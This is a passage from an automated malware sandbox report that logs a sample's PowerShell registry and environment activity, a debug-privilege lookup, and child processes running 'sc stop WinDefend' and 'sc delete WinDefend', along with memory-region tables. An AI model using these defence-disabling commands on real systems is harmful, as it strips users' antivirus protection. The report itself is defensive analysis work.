| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
6 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
6 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (115)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
107 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PATH |
|
1 | |
| Get Environment String | name = PATH, result_out = %SystemRoot%\system32\WindowsPowerShell\v1.0\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 |
Process #10: sc.exe
8
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:46, Reason: Child Process |
| Unmonitor | End Time: 00:01:47, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x398 |
| Parent PID | 0x924 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
66C
0x
704
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| sc.exe.mui | 0x00080000 | 0x0008ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| sc.exe | 0x00130000 | 0x0013bfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x00236fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x004d0000 | 0x0058ffff | Memory Mapped File | rw |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\sc.exe | base_address = 0x130000 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:03 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 163192 |
|
1 |
Process #11: sc.exe
8
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:46, Reason: Child Process |
| Unmonitor | End Time: 00:01:47, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7d4 |
| Parent PID | 0x910 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
930
0x
584
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| sc.exe.mui | 0x000f0000 | 0x000fffff | Memory Mapped File | rw |
|
|
|
- |
| sc.exe | 0x00130000 | 0x0013bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll.mui | 0x00140000 | 0x001fffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\sc.exe | base_address = 0x130000 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:03 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 163161 |
|
1 |
Process #14: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\syswow64\dllhost.exe |
| Command Line | C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:50, Reason: RPC Server |
| Unmonitor | End Time: 00:01:57, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5d4 |
| Parent PID | 0x254 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1CC
0x
76C
0x
6D4
0x
20C
0x
40C
0x
5CC
0x
2C8
0x
6C4
0x
480
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
